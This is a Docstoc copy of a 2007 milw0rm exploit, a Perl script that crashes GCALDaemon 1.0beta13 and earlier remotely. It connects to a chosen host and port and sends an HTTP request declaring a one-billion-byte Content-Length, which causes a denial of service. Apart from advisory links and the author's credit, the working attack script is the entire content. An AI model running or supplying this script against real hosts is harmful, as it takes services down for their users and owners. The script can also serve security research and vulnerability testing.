GCALDaemon 1.0beta13 Remote Denial of Service Exploit

Document Sample
GCALDaemon 1.0beta13 Remote Denial of Service Exploit Powered By Docstoc
					                             GCALDaemon 1.0beta13 Remote Denial of Service Exploit   Page 1/1
       1   #!/usr/bin/perl
       2   # /*
       3   # * GCALDaemon <= 1.0−beta13 Remote DoS
       4   # *
       5   # * Original Advisory:
       6   # * http://www.securityfocus.com/bid/25704/info
       7   # * http://www.ikkisoft.com/stuff/SN−2007−01.txt
       8   # *
       9   # * Luca "ikki" Carettoni
   10      # * http://www.ikkisoft.com
   11      # */
   12
   13      use strict;
   14      use warnings;
   15      use IO::Socket;
   16
   17      my $host = shift || die "Usage: $0 host [port]\n";
   18      my $port = shift || 9090;
   19      my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
   20      PeerProto => ’tcp’)
   21      or die "error: $!\n";
   22      print "GCALDaemom DoS Expoit\n";
   23      print "Just 4 seconds...\n";
   24      sleep 4;
   25      $sock−>send("GET / HTTP/1.1\r\n");
   26      $sock−>send("Content−Length: 1000000000\r\n\r\n");
   27      $sock−>close;
   28      print "\n\nNo more sync!\n";
   29
   30      # milw0rm.com [2007−10−16]




ikki                                                                                 10/16/2007

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:21
posted:5/24/2010
language:English
pages:1